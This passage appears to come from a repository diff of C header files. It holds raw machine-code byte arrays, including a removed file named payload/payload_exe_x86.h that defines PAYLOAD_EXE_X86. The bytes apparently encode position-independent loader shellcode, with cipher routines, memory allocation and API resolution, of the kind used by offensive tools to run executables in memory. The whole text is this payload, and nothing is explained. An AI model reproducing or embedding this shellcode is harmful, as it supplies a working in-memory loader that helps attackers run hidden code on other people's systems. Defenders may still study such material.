1252 0x48, 0x89, 0x4d, 0x10, 0x48, 0x89, 0x55, 0x18, 0x48, 0x8b, 0x45, 0x18,
1253 0x48, 0x89, 0x45, 0xd8, 0xc7, 0x45, 0xfc, 0x00, 0x00, 0x00, 0x00, 0xeb,
1254 0x1f, 0x8b, 0x45, 0xfc, 0x48, 0x8d, 0x14, 0x85, 0x00, 0x00, 0x00, 0x00,
1255 0x48, 0x8b, 0x45, 0x10, 0x48, 0x01, 0xd0, 0x8b, 0x10, 0x8b, 0x45, 0xfc,
1256 0x89, 0x54, 0x85, 0xe0, 0x83, 0x45, 0xfc, 0x01, 0x83, 0x7d, 0xfc, 0x03,
1257 0x76, 0xdb, 0xc7, 0x45, 0xfc, 0x00, 0x00, 0x00, 0x00, 0xeb, 0x5e, 0x8b,
1258 0x45, 0xd8, 0xc1, 0xc8, 0x08, 0x89, 0xc2, 0x8b, 0x45, 0xdc, 0x01, 0xc2,
1259 0x8b, 0x45, 0xe0, 0x31, 0xd0, 0x89, 0x45, 0xd8, 0x8b, 0x45, 0xdc, 0xc1,
1260 0xc0, 0x03, 0x89, 0xc2, 0x8b, 0x45, 0xd8, 0x31, 0xd0, 0x89, 0x45, 0xdc,
1261 0x8b, 0x45, 0xec, 0x89, 0x45, 0xf8, 0x8b, 0x45, 0xe4, 0xc1, 0xc8, 0x08,
1262 0x89, 0xc2, 0x8b, 0x45, 0xe0, 0x01, 0xd0, 0x33, 0x45, 0xfc, 0x89, 0x45,
1263 0xec, 0x8b, 0x45, 0xe0, 0xc1, 0xc0, 0x03, 0x89, 0xc2, 0x8b, 0x45, 0xec,
1264 0x31, 0xd0, 0x89, 0x45, 0xe0, 0x8b, 0x45, 0xe8, 0x89, 0x45, 0xe4, 0x8b,
1265 0x45, 0xf8, 0x89, 0x45, 0xe8, 0x83, 0x45, 0xfc, 0x01, 0x83, 0x7d, 0xfc,
1266 0x1a, 0x76, 0x9c, 0x48, 0x8b, 0x45, 0xd8, 0x48, 0x83, 0xc4, 0x30, 0x5d,
1267 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x48, 0x83, 0xec, 0x50, 0x48, 0x89, 0x4d,
1268 0x10, 0x48, 0x89, 0x55, 0x18, 0x48, 0x8b, 0x45, 0x10, 0x48, 0x89, 0x45,
1269 0xe0, 0x48, 0x8b, 0x45, 0x18, 0x48, 0x89, 0x45, 0xf8, 0xc7, 0x45, 0xf0,
1270 0x00, 0x00, 0x00, 0x00, 0xc7, 0x45, 0xf4, 0x00, 0x00, 0x00, 0x00, 0xc7,
1271 0x45, 0xec, 0x00, 0x00, 0x00, 0x00, 0xe9, 0xc9, 0x00, 0x00, 0x00, 0x8b,
1272 0x55, 0xf4, 0x48, 0x8b, 0x45, 0xe0, 0x48, 0x01, 0xd0, 0x0f, 0xb6, 0x00,
1273 0x84, 0xc0, 0x74, 0x06, 0x83, 0x7d, 0xf4, 0x40, 0x75, 0x73, 0xb8, 0x10,
1274 0x00, 0x00, 0x00, 0x2b, 0x45, 0xf0, 0x89, 0xc1, 0x48, 0x8d, 0x55, 0xd0,
1275 0x8b, 0x45, 0xf0, 0x48, 0x01, 0xd0, 0x49, 0x89, 0xc8, 0xba, 0x00, 0x00,
1276 0x00, 0x00, 0x48, 0x89, 0xc1, 0xe8, 0xbe, 0xfd, 0xff, 0xff, 0x8b, 0x45,
1277 0xf0, 0xc6, 0x44, 0x05, 0xd0, 0x80, 0x83, 0x7d, 0xf0, 0x0b, 0x76, 0x2b,
1278 0x48, 0x8b, 0x55, 0xf8, 0x48, 0x8d, 0x45, 0xd0, 0x48, 0x89, 0xc1, 0xe8,
1279 0xb0, 0xfe, 0xff, 0xff, 0x48, 0x31, 0x45, 0xf8, 0x48, 0x8d, 0x45, 0xd0,
1280 0x41, 0xb8, 0x10, 0x00, 0x00, 0x00, 0xba, 0x00, 0x00, 0x00, 0x00, 0x48,
1281 0x89, 0xc1, 0xe8, 0x85, 0xfd, 0xff, 0xff, 0x8b, 0x45, 0xf4, 0xc1, 0xe0,
1282 0x03, 0x89, 0x45, 0xdc, 0xc7, 0x45, 0xf0, 0x10, 0x00, 0x00, 0x00, 0x83,
1283 0x45, 0xec, 0x01, 0xeb, 0x1e, 0x8b, 0x55, 0xf4, 0x48, 0x8b, 0x45, 0xe0,
1284 0x48, 0x01, 0xd0, 0x0f, 0xb6, 0x00, 0x89, 0xc2, 0x8b, 0x45, 0xf0, 0x88,
1285 0x54, 0x05, 0xd0, 0x83, 0x45, 0xf0, 0x01, 0x83, 0x45, 0xf4, 0x01, 0x83,
1286 0x7d, 0xf0, 0x10, 0x75, 0x1b, 0x48, 0x8b, 0x55, 0xf8, 0x48, 0x8d, 0x45,
1287 0xd0, 0x48, 0x89, 0xc1, 0xe8, 0x4b, 0xfe, 0xff, 0xff, 0x48, 0x31, 0x45,
1288 0xf8, 0xc7, 0x45, 0xf0, 0x00, 0x00, 0x00, 0x00, 0x83, 0x7d, 0xec, 0x00,
1289 0x0f, 0x84, 0x2d, 0xff, 0xff, 0xff, 0x48, 0x8b, 0x45, 0xf8, 0x48, 0x83,
1290 0xc4, 0x50, 0x5d, 0xc3, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
1291 0x90, 0x90, 0x90, 0x90, 0x55, 0x48, 0x89, 0xe5, 0x48, 0x83, 0xec, 0x20,
1292 0x48, 0x89, 0x4d, 0x10, 0x48, 0x89, 0x55, 0x18, 0x48, 0x8b, 0x45, 0x18,
1293 0x48, 0x89, 0x45, 0xf0, 0x48, 0x8b, 0x45, 0x10, 0x48, 0x89, 0x45, 0xe8,
1294 0xc7, 0x45, 0xfc, 0x00, 0x00, 0x00, 0x00, 0xeb, 0x42, 0x8b, 0x45, 0xfc,
1295 0x48, 0x8d, 0x14, 0x85, 0x00, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x45, 0xf0,
1296 0x48, 0x01, 0xd0, 0x8b, 0x55, 0xfc, 0x48, 0x8d, 0x0c, 0x95, 0x00, 0x00,
1297 0x00, 0x00, 0x48, 0x8b, 0x55, 0xf0, 0x48, 0x01, 0xca, 0x8b, 0x0a, 0x8b,
1298 0x55, 0xfc, 0x4c, 0x8d, 0x04, 0x95, 0x00, 0x00, 0x00, 0x00, 0x48, 0x8b,
1299 0x55, 0xe8, 0x4c, 0x01, 0xc2, 0x8b, 0x12, 0x31, 0xca, 0x89, 0x10, 0x83,
1300 0x45, 0xfc, 0x01, 0x83, 0x7d, 0xfc, 0x03, 0x76, 0xb8, 0xc7, 0x45, 0xfc,
1301 0x00, 0x00, 0x00, 0x00, 0xe9, 0x1c, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x45,
1302 0xf0, 0x8b, 0x10, 0x48, 0x8b, 0x45, 0xf0, 0x48, 0x83, 0xc0, 0x04, 0x8b,
1303 0x00, 0x01, 0xc2, 0x48, 0x8b, 0x45, 0xf0, 0x89, 0x10, 0x48, 0x8b, 0x45,
1304 0xf0, 0x48, 0x8d, 0x50, 0x04, 0x48, 0x8b, 0x45, 0xf0, 0x48, 0x83, 0xc0,
1305 0x04, 0x8b, 0x00, 0xc1, 0xc0, 0x05, 0x89, 0xc1, 0x48, 0x8b, 0x45, 0xf0,
1306 0x8b, 0x00, 0x31, 0xc8, 0x89, 0x02, 0x48, 0x8b, 0x45, 0xf0, 0x48, 0x83,
1307 0xc0, 0x08, 0x48, 0x8b, 0x55, 0xf0, 0x48, 0x83, 0xc2, 0x08, 0x8b, 0x0a,
1308 0x48, 0x8b, 0x55, 0xf0, 0x48, 0x83, 0xc2, 0x0c, 0x8b, 0x12, 0x01, 0xca,
1309 0x89, 0x10, 0x48, 0x8b, 0x45, 0xf0, 0x48, 0x83, 0xc0, 0x0c, 0x48, 0x8b,
1310 0x55, 0xf0, 0x48, 0x83, 0xc2, 0x0c, 0x8b, 0x12, 0x89, 0xd1, 0xc1, 0xc1,
1311 0x08, 0x48, 0x8b, 0x55, 0xf0, 0x48, 0x83, 0xc2, 0x08, 0x8b, 0x12, 0x31,
1312 0xca, 0x89, 0x10, 0x48, 0x8b, 0x45, 0xf0, 0x48, 0x83, 0xc0, 0x08, 0x48,
1313 0x8b, 0x55, 0xf0, 0x48, 0x83, 0xc2, 0x08, 0x8b, 0x0a, 0x48, 0x8b, 0x55,
1314 0xf0, 0x48, 0x83, 0xc2, 0x04, 0x8b, 0x12, 0x01, 0xca, 0x89, 0x10, 0x48,
1315 0x8b, 0x45, 0xf0, 0x8b, 0x00, 0xc1, 0xc0, 0x10, 0x89, 0xc2, 0x48, 0x8b,
1316 0x45, 0xf0, 0x48, 0x83, 0xc0, 0x0c, 0x8b, 0x00, 0x01, 0xc2, 0x48, 0x8b,
1317 0x45, 0xf0, 0x89, 0x10, 0x48, 0x8b, 0x45, 0xf0, 0x48, 0x8d, 0x50, 0x0c,
1318 0x48, 0x8b, 0x45, 0xf0, 0x48, 0x83, 0xc0, 0x0c, 0x8b, 0x00, 0xc1, 0xc0,
1319 0x0d, 0x89, 0xc1, 0x48, 0x8b, 0x45, 0xf0, 0x8b, 0x00, 0x31, 0xc8, 0x89,
1320 0x02, 0x48, 0x8b, 0x45, 0xf0, 0x48, 0x83, 0xc0, 0x04, 0x48, 0x8b, 0x55,
1321 0xf0, 0x48, 0x83, 0xc2, 0x04, 0x8b, 0x12, 0x89, 0xd1, 0xc1, 0xc1, 0x07,
1322 0x48, 0x8b, 0x55, 0xf0, 0x48, 0x83, 0xc2, 0x08, 0x8b, 0x12, 0x31, 0xca,
1323 0x89, 0x10, 0x48, 0x8b, 0x45, 0xf0, 0x48, 0x83, 0xc0, 0x08, 0x48, 0x8b,
1324 0x55, 0xf0, 0x48, 0x83, 0xc2, 0x08, 0x8b, 0x12, 0xc1, 0xc2, 0x10, 0x89,
1325 0x10, 0x83, 0x45, 0xfc, 0x01, 0x83, 0x7d, 0xfc, 0x0f, 0x0f, 0x86, 0xda,
1326 0xfe, 0xff, 0xff, 0xc7, 0x45, 0xfc, 0x00, 0x00, 0x00, 0x00, 0xeb, 0x42,
1327 0x8b, 0x45, 0xfc, 0x48, 0x8d, 0x14, 0x85, 0x00, 0x00, 0x00, 0x00, 0x48,
1328 0x8b, 0x45, 0xf0, 0x48, 0x01, 0xd0, 0x8b, 0x55, 0xfc, 0x48, 0x8d, 0x0c,
1329 0x95, 0x00, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x55, 0xf0, 0x48, 0x01, 0xca,
1330 0x8b, 0x0a, 0x8b, 0x55, 0xfc, 0x4c, 0x8d, 0x04, 0x95, 0x00, 0x00, 0x00,
1331 0x00, 0x48, 0x8b, 0x55, 0xe8, 0x4c, 0x01, 0xc2, 0x8b, 0x12, 0x31, 0xca,
1332 0x89, 0x10, 0x83, 0x45, 0xfc, 0x01, 0x83, 0x7d, 0xfc, 0x03, 0x76, 0xb8,
1333 0x90, 0x48, 0x83, 0xc4, 0x20, 0x5d, 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x48,
1334 0x83, 0xec, 0x50, 0x48, 0x89, 0x4d, 0x10, 0x48, 0x89, 0x55, 0x18, 0x4c,
1335 0x89, 0x45, 0x20, 0x4c, 0x89, 0x4d, 0x28, 0x48, 0x8b, 0x45, 0x20, 0x48,
1336 0x89, 0x45, 0xf8, 0x48, 0x8b, 0x45, 0x18, 0x48, 0x89, 0x45, 0xe8, 0xe9,
1337 0xd4, 0x00, 0x00, 0x00, 0xc7, 0x45, 0xf4, 0x00, 0x00, 0x00, 0x00, 0xeb,
1338 0x1d, 0x8b, 0x45, 0xf4, 0x48, 0x63, 0xd0, 0x48, 0x8b, 0x45, 0xe8, 0x48,
1339 0x01, 0xd0, 0x0f, 0xb6, 0x10, 0x8b, 0x45, 0xf4, 0x48, 0x98, 0x88, 0x54,
1340 0x05, 0xd0, 0x83, 0x45, 0xf4, 0x01, 0x83, 0x7d, 0xf4, 0x0f, 0x7e, 0xdd,
1341 0x48, 0x8d, 0x45, 0xd0, 0x48, 0x89, 0xc2, 0x48, 0x8b, 0x4d, 0x10, 0xe8,
1342 0x9c, 0xfd, 0xff, 0xff, 0xb8, 0x10, 0x00, 0x00, 0x00, 0x48, 0x83, 0x7d,
1343 0x28, 0x10, 0x48, 0x0f, 0x46, 0x45, 0x28, 0x89, 0x45, 0xe4, 0xc7, 0x45,
1344 0xf4, 0x00, 0x00, 0x00, 0x00, 0xeb, 0x2f, 0x8b, 0x45, 0xf4, 0x48, 0x63,
1345 0xd0, 0x48, 0x8b, 0x45, 0xf8, 0x48, 0x01, 0xc2, 0x8b, 0x45, 0xf4, 0x48,
1346 0x63, 0xc8, 0x48, 0x8b, 0x45, 0xf8, 0x48, 0x01, 0xc8, 0x0f, 0xb6, 0x08,
1347 0x8b, 0x45, 0xf4, 0x48, 0x98, 0x0f, 0xb6, 0x44, 0x05, 0xd0, 0x31, 0xc8,
1348 0x88, 0x02, 0x83, 0x45, 0xf4, 0x01, 0x8b, 0x45, 0xf4, 0x3b, 0x45, 0xe4,
1349 0x7c, 0xc9, 0x8b, 0x45, 0xe4, 0x48, 0x98, 0x48, 0x29, 0x45, 0x28, 0x8b,
1350 0x45, 0xe4, 0x48, 0x98, 0x48, 0x01, 0x45, 0xf8, 0xc7, 0x45, 0xf4, 0x10,
1351 0x00, 0x00, 0x00, 0xeb, 0x25, 0x8b, 0x45, 0xf4, 0x48, 0x98, 0x48, 0x8d,
1352 0x50, 0xff, 0x48, 0x8b, 0x45, 0xe8, 0x48, 0x01, 0xd0, 0x0f, 0xb6, 0x10,
1353 0x83, 0xc2, 0x01, 0x88, 0x10, 0x0f, 0xb6, 0x00, 0x84, 0xc0, 0x74, 0x02,
1354 0xeb, 0x0a, 0x83, 0x6d, 0xf4, 0x01, 0x83, 0x7d, 0xf4, 0x00, 0x7f, 0xd5,
1355 0x48, 0x83, 0x7d, 0x28, 0x00, 0x0f, 0x85, 0x21, 0xff, 0xff, 0xff, 0x90,
1356 0x48, 0x83, 0xc4, 0x50, 0x5d, 0xc3, 0x90, 0x90, 0xff, 0xff, 0xff, 0xff,
1357 0xff, 0xff, 0xff, 0xff, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
1358 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0x00, 0x00, 0x00, 0x00,
1359 0x00, 0x00, 0x00, 0x00};
1360
+0
-638
payload/payload_exe_x86.h less more
0
1 unsigned char PAYLOAD_EXE_X86[] = {
2 0x83, 0xec, 0x20, 0x53, 0x55, 0x56, 0x57, 0x8b, 0x7c, 0x24, 0x34, 0xff,
3 0x77, 0x2c, 0xff, 0x77, 0x28, 0xff, 0x77, 0x4c, 0xff, 0x77, 0x48, 0x57,
4 0xe8, 0xd1, 0x1a, 0x00, 0x00, 0xff, 0x77, 0x2c, 0x8b, 0xf0, 0xff, 0x77,
5 0x28, 0xff, 0x77, 0x54, 0xff, 0x77, 0x50, 0x57, 0xe8, 0xbd, 0x1a, 0x00,
6 0x00, 0x83, 0xc4, 0x28, 0x8b, 0xd8, 0x89, 0x5c, 0x24, 0x34, 0x85, 0xf6,
7 0x0f, 0x84, 0x15, 0x02, 0x00, 0x00, 0x85, 0xdb, 0x0f, 0x84, 0x0d, 0x02,
8 0x00, 0x00, 0x6a, 0x04, 0x68, 0x00, 0x30, 0x00, 0x00, 0xff, 0x37, 0x6a,
9 0x00, 0xff, 0xd6, 0x8b, 0xf0, 0x85, 0xf6, 0x0f, 0x84, 0xf6, 0x01, 0x00,
10 0x00, 0xff, 0x37, 0x57, 0x56, 0xe8, 0x17, 0x1d, 0x00, 0x00, 0x6a, 0x20,
11 0x8d, 0x44, 0x24, 0x20, 0x6a, 0x00, 0x50, 0xe8, 0x2d, 0x1d, 0x00, 0x00,
12 0x8b, 0x06, 0x8d, 0xae, 0x30, 0x02, 0x00, 0x00, 0x2d, 0x30, 0x02, 0x00,
13 0x00, 0x50, 0x55, 0x8d, 0x46, 0x14, 0x50, 0x8d, 0x46, 0x04, 0x50, 0xe8,
14 0xec, 0x1b, 0x00, 0x00, 0xff, 0x76, 0x2c, 0x8d, 0x86, 0x18, 0x06, 0x00,
15 0x00, 0xff, 0x76, 0x28, 0x50, 0xe8, 0xb5, 0x1a, 0x00, 0x00, 0x83, 0xc4,
16 0x34, 0x3b, 0x86, 0x18, 0x07, 0x00, 0x00, 0x0f, 0x85, 0x4f, 0x01, 0x00,
17 0x00, 0x3b, 0x96, 0x1c, 0x07, 0x00, 0x00, 0x0f, 0x85, 0x43, 0x01, 0x00,
18 0x00, 0xff, 0x76, 0x2c, 0xff, 0x76, 0x28, 0xff, 0x76, 0x34, 0xff, 0x76,
19 0x30, 0x56, 0xe8, 0x1b, 0x1a, 0x00, 0x00, 0x83, 0xc4, 0x14, 0x89, 0x46,
20 0x30, 0x85, 0xc0, 0x0f, 0x84, 0x76, 0x01, 0x00, 0x00, 0x33, 0xff, 0x39,
21 0xbe, 0x34, 0x02, 0x00, 0x00, 0x76, 0x16, 0x8d, 0x9e, 0x38, 0x02, 0x00,
22 0x00, 0x53, 0xff, 0x56, 0x30, 0x47, 0x83, 0xc3, 0x20, 0x3b, 0xbe, 0x34,
23 0x02, 0x00, 0x00, 0x72, 0xf0, 0x33, 0xdb, 0x43, 0x39, 0x5d, 0x00, 0x76,
24 0x34, 0x8d, 0x6e, 0x34, 0x8d, 0x7e, 0x38, 0xff, 0x76, 0x2c, 0xff, 0x76,
25 0x28, 0xff, 0x77, 0x04, 0xff, 0x37, 0x56, 0xe8, 0xce, 0x19, 0x00, 0x00,
26 0x83, 0xc4, 0x14, 0x89, 0x45, 0x00, 0x85, 0xc0, 0x0f, 0x84, 0xd2, 0x00,
27 0x00, 0x00, 0x43, 0x83, 0xc7, 0x08, 0x83, 0xc5, 0x04, 0x3b, 0x9e, 0x30,
28 0x02, 0x00, 0x00, 0x72, 0xd2, 0x8b, 0x86, 0x0c, 0x05, 0x00, 0x00, 0x6a,
29 0x02, 0x5b, 0x3b, 0xc3, 0x75, 0x15, 0x56, 0xe8, 0x29, 0x05, 0x00, 0x00,
30 0x59, 0x85, 0xc0, 0x0f, 0x84, 0xa7, 0x00, 0x00, 0x00, 0x8b, 0x86, 0x0c,
31 0x05, 0x00, 0x00, 0x8d, 0xbe, 0x48, 0x07, 0x00, 0x00, 0x83, 0xf8, 0x01,
32 0x74, 0x02, 0x8b, 0x3f, 0x83, 0xbe, 0x40, 0x03, 0x00, 0x00, 0x01, 0x74,
33 0x26, 0x56, 0xe8, 0x32, 0x03, 0x00, 0x00, 0x59, 0x85, 0xc0, 0x75, 0x08,
34 0x39, 0x9e, 0x40, 0x03, 0x00, 0x00, 0x74, 0x78, 0x56, 0xe8, 0x05, 0x04,
35 0x00, 0x00, 0x59, 0x85, 0xc0, 0x75, 0x08, 0x39, 0x9e, 0x40, 0x03, 0x00,
36 0x00, 0x74, 0x65, 0x83, 0x3f, 0x03, 0x74, 0x59, 0x83, 0x3f, 0x04, 0x74,
37 0x54, 0x83, 0x3f, 0x01, 0x74, 0x23, 0x39, 0x1f, 0x74, 0x1f, 0x83, 0x3f,
38 0x05, 0x74, 0x12, 0x83, 0x3f, 0x06, 0x74, 0x0d, 0x83, 0x3f, 0x07, 0x75,
39 0x43, 0x56, 0xe8, 0xe5, 0x17, 0x00, 0x00, 0xeb, 0x3a, 0x56, 0xe8, 0x4c,
40 0x16, 0x00, 0x00, 0xeb, 0x32, 0x8d, 0x44, 0x24, 0x10, 0x50, 0x56, 0xe8,
41 0xe7, 0x0c, 0x00, 0x00, 0x59, 0x59, 0x85, 0xc0, 0x74, 0x0d, 0x8d, 0x44,
42 0x24, 0x10, 0x50, 0x56, 0xe8, 0xe1, 0x0e, 0x00, 0x00, 0x59, 0x59, 0x8d,
43 0x44, 0x24, 0x10, 0x50, 0x56, 0xe8, 0x5d, 0x08, 0x00, 0x00, 0x59, 0xeb,
44 0x06, 0x56, 0xe8, 0x91, 0x11, 0x00, 0x00, 0x59, 0x8b, 0x5c, 0x24, 0x34,
45 0x83, 0xbe, 0x0c, 0x05, 0x00, 0x00, 0x02, 0xbf, 0x00, 0xc0, 0x00, 0x00,
46 0x75, 0x2e, 0x8b, 0x86, 0x48, 0x07, 0x00, 0x00, 0x85, 0xc0, 0x74, 0x24,
47 0xff, 0xb6, 0x40, 0x07, 0x00, 0x00, 0x6a, 0x00, 0x50, 0xe8, 0x7b, 0x1b,
48 0x00, 0x00, 0x83, 0xc4, 0x0c, 0x57, 0x6a, 0x00, 0xff, 0xb6, 0x48, 0x07,
49 0x00, 0x00, 0xff, 0x56, 0x40, 0x83, 0xa6, 0x48, 0x07, 0x00, 0x00, 0x00,
50 0xff, 0x36, 0x6a, 0x00, 0x56, 0xe8, 0x5b, 0x1b, 0x00, 0x00, 0x83, 0xc4,
51 0x0c, 0x57, 0x6a, 0x00, 0x56, 0xff, 0xd3, 0x33, 0xc0, 0xeb, 0x03, 0x83,
52 0xc8, 0xff, 0x5f, 0x5e, 0x5d, 0x5b, 0x83, 0xc4, 0x20, 0xc3, 0x8b, 0x44,
53 0x24, 0x04, 0x83, 0xc0, 0x04, 0xf0, 0xff, 0x00, 0x8b, 0x00, 0xc2, 0x04,
54 0x00, 0x33, 0xc0, 0xc2, 0x08, 0x00, 0x55, 0x8b, 0xec, 0xf6, 0x45, 0x10,
55 0x02, 0x56, 0x8b, 0x75, 0x08, 0x57, 0x74, 0x15, 0x8b, 0x7d, 0x18, 0x85,
56 0xff, 0x74, 0x1b, 0x8b, 0x46, 0x14, 0x50, 0x8b, 0x08, 0xff, 0x51, 0x04,
57 0x8b, 0x46, 0x14, 0x89, 0x07, 0xf6, 0x45, 0x10, 0x01, 0x74, 0x19, 0x8b,
58 0x7d, 0x14, 0x85, 0xff, 0x75, 0x07, 0xb8, 0x03, 0x40, 0x00, 0x80, 0xeb,
59 0x0d, 0x83, 0xc6, 0x0c, 0x56, 0x8b, 0x06, 0xff, 0x50, 0x04, 0x89, 0x37,
60 0x33, 0xc0, 0x5f, 0x5e, 0x5d, 0xc2, 0x14, 0x00, 0x8b, 0x44, 0x24, 0x04,
61 0x8b, 0x40, 0x28, 0xff, 0x50, 0x54, 0x8b, 0x4c, 0x24, 0x08, 0x89, 0x01,
62 0x33, 0xc0, 0xc2, 0x08, 0x00, 0x56, 0x57, 0xe8, 0x08, 0x18, 0x00, 0x00,
63 0x8b, 0x74, 0x24, 0x10, 0xb9, 0x13, 0x14, 0x40, 0x00, 0xbf, 0xe4, 0x2a,
64 0x40, 0x00, 0x2b, 0xcf, 0x03, 0xc8, 0x8b, 0x06, 0x89, 0x08, 0xe8, 0xed,
65 0x17, 0x00, 0x00, 0xb9, 0x62, 0x12, 0x40, 0x00, 0x2b, 0xcf, 0x03, 0xc8,
66 0x8b, 0x06, 0x89, 0x48, 0x04, 0xe8, 0xda, 0x17, 0x00, 0x00, 0xb9, 0x72,
67 0x14, 0x40, 0x00, 0x2b, 0xcf, 0x03, 0xc8, 0x8b, 0x06, 0x89, 0x48, 0x08,
68 0xe8, 0xc7, 0x17, 0x00, 0x00, 0xb9, 0xc0, 0x12, 0x40, 0x00, 0x2b, 0xcf,
69 0x03, 0xc8, 0x8b, 0x06, 0x89, 0x48, 0x0c, 0xe8, 0xb4, 0x17, 0x00, 0x00,
70 0xb9, 0x76, 0x12, 0x40, 0x00, 0x2b, 0xcf, 0x03, 0xc8, 0x8b, 0x06, 0x89,
71 0x48, 0x10, 0xe8, 0xa1, 0x17, 0x00, 0x00, 0xb9, 0x71, 0x12, 0x40, 0x00,
72 0x2b, 0xcf, 0x03, 0xc8, 0x8b, 0x06, 0x89, 0x48, 0x14, 0xe8, 0x8e, 0x17,
73 0x00, 0x00, 0xb9, 0x0e, 0x14, 0x40, 0x00, 0x2b, 0xcf, 0x03, 0xc8, 0x8b,
74 0x06, 0x89, 0x48, 0x18, 0xe8, 0x7b, 0x17, 0x00, 0x00, 0xb9, 0x71, 0x12,
75 0x40, 0x00, 0x2b, 0xcf, 0x03, 0xc8, 0x8b, 0x06, 0x89, 0x48, 0x1c, 0xe8,
76 0x68, 0x17, 0x00, 0x00, 0xb9, 0xc3, 0x13, 0x40, 0x00, 0x2b, 0xcf, 0x03,
77 0xc8, 0x8b, 0x06, 0x89, 0x48, 0x20, 0xe8, 0x55, 0x17, 0x00, 0x00, 0xb9,
78 0xbe, 0x13, 0x40, 0x00, 0x2b, 0xcf, 0x03, 0xc8, 0x8b, 0x06, 0x89, 0x48,
79 0x24, 0xe8, 0x42, 0x17, 0x00, 0x00, 0xb9, 0xbe, 0x13, 0x40, 0x00, 0x2b,
80 0xcf, 0x03, 0xc8, 0x8b, 0x06, 0x5f, 0x89, 0x48, 0x28, 0x8b, 0x44, 0x24,
81 0x08, 0x83, 0x66, 0x04, 0x00, 0x89, 0x46, 0x28, 0x5e, 0xc3, 0x33, 0xc0,
82 0xc2, 0x04, 0x00, 0x55, 0x8b, 0xec, 0x83, 0xec, 0x2c, 0x33, 0xc0, 0x56,
83 0x6a, 0x20, 0x50, 0x89, 0x45, 0xf4, 0x89, 0x45, 0xf8, 0x89, 0x45, 0xfc,
84 0x8d, 0x45, 0xd4, 0x50, 0xe8, 0xc4, 0x19, 0x00, 0x00, 0x8b, 0x75, 0x0c,
85 0x8d, 0x4d, 0xd4, 0x83, 0xc4, 0x0c, 0x8b, 0x06, 0x51, 0x56, 0xff, 0x50,
86 0x0c, 0x85, 0xc0, 0x75, 0x12, 0x8b, 0x06, 0x8d, 0x4d, 0xfc, 0x51, 0x8d,
87 0x4d, 0xf8, 0x51, 0x8d, 0x4d, 0xf4, 0x51, 0x56, 0xff, 0x50, 0x10, 0x33,
88 0xc0, 0x5e, 0xc9, 0xc2, 0x08, 0x00, 0x33, 0xc0, 0xc2, 0x0c, 0x00, 0x8b,
89 0x4c, 0x24, 0x0c, 0x85, 0xc9, 0x75, 0x07, 0xb8, 0x03, 0x40, 0x00, 0x80,
90 0xeb, 0x4d, 0x53, 0x8b, 0x5c, 0x24, 0x0c, 0x33, 0xd2, 0x56, 0x8b, 0x74,
91 0x24, 0x0c, 0x57, 0x8b, 0x7e, 0x28, 0x8b, 0x84, 0x97, 0xfc, 0x03, 0x00,
92 0x00, 0x3b, 0x04, 0x93, 0x75, 0x08, 0x42, 0x83, 0xfa, 0x04, 0x75, 0xee,
93 0xeb, 0x14, 0x33, 0xd2, 0x8b, 0x84, 0x97, 0xac, 0x04, 0x00, 0x00, 0x3b,
94 0x04, 0x93, 0x75, 0x10, 0x42, 0x83, 0xfa, 0x04, 0x75, 0xee, 0x89, 0x31,
95 0xf0, 0xff, 0x46, 0x04, 0x33, 0xc0, 0xeb, 0x08, 0x83, 0x21, 0x00, 0xb8,
96 0x02, 0x40, 0x00, 0x80, 0x5f, 0x5e, 0x5b, 0xc2, 0x0c, 0x00, 0x8b, 0x4c,
97 0x24, 0x04, 0x83, 0xc8, 0xff, 0xf0, 0x0f, 0xc1, 0x41, 0x04, 0x48, 0xc2,
98 0x04, 0x00, 0x8b, 0x44, 0x24, 0x18, 0x83, 0x20, 0x00, 0x33, 0xc0, 0xc2,
99 0x18, 0x00, 0x8b, 0x44, 0x24, 0x04, 0x0f, 0xaf, 0x44, 0x24, 0x08, 0xc3,
100 0x8b, 0x44, 0x24, 0x14, 0x83, 0x20, 0x00, 0x33, 0xc0, 0xc2, 0x14, 0x00,
101 0x8b, 0x44, 0x24, 0x04, 0x03, 0x44, 0x24, 0x08, 0xc3, 0x51, 0x53, 0x56,
102 0x8b, 0x74, 0x24, 0x10, 0x8d, 0x86, 0x38, 0x03, 0x00, 0x00, 0x50, 0xff,
103 0x56, 0x30, 0x8b, 0xd8, 0x85, 0xdb, 0x75, 0x06, 0x40, 0xe9, 0xc5, 0x00,
104 0x00, 0x00, 0x55, 0x57, 0x8d, 0x86, 0xac, 0x03, 0x00, 0x00, 0x50, 0x53,
105 0xff, 0x56, 0x34, 0x8b, 0xe8, 0x85, 0xed, 0x0f, 0x84, 0xaa, 0x00, 0x00,
106 0x00, 0xbf, 0x8e, 0x14, 0x40, 0x00, 0x81, 0xef, 0x82, 0x14, 0x40, 0x00,
107 0x0f, 0x88, 0x99, 0x00, 0x00, 0x00, 0x8d, 0x44, 0x24, 0x18, 0x50, 0x6a,
108 0x40, 0x57, 0x55, 0xff, 0x56, 0x48, 0x85, 0xc0, 0x0f, 0x84, 0x85, 0x00,
109 0x00, 0x00, 0x57, 0xe8, 0xd8, 0x15, 0x00, 0x00, 0xb9, 0x82, 0x14, 0x40,
110 0x00, 0x81, 0xe9, 0xe4, 0x2a, 0x40, 0x00, 0x03, 0xc1, 0x50, 0x55, 0xe8,
111 0x61, 0x18, 0x00, 0x00, 0x83, 0xc4, 0x0c, 0x8d, 0x44, 0x24, 0x10, 0x50,
112 0xff, 0x74, 0x24, 0x1c, 0x57, 0x55, 0xff, 0x56, 0x48, 0x8d, 0x86, 0xbc,
113 0x03, 0x00, 0x00, 0x50, 0x53, 0xff, 0x56, 0x34, 0x8b, 0xe8, 0x85, 0xed,
114 0x74, 0x49, 0xbf, 0xa4, 0x14, 0x40, 0x00, 0xbb, 0x98, 0x14, 0x40, 0x00,
115 0x2b, 0xfb, 0x78, 0x3b, 0x8d, 0x44, 0x24, 0x18, 0x50, 0x6a, 0x40, 0x57,
116 0x55, 0xff, 0x56, 0x48, 0x85, 0xc0, 0x74, 0x2b, 0x57, 0xe8, 0x7e, 0x15,
117 0x00, 0x00, 0x81, 0xeb, 0xe4, 0x2a, 0x40, 0x00, 0x03, 0xc3, 0x50, 0x55,
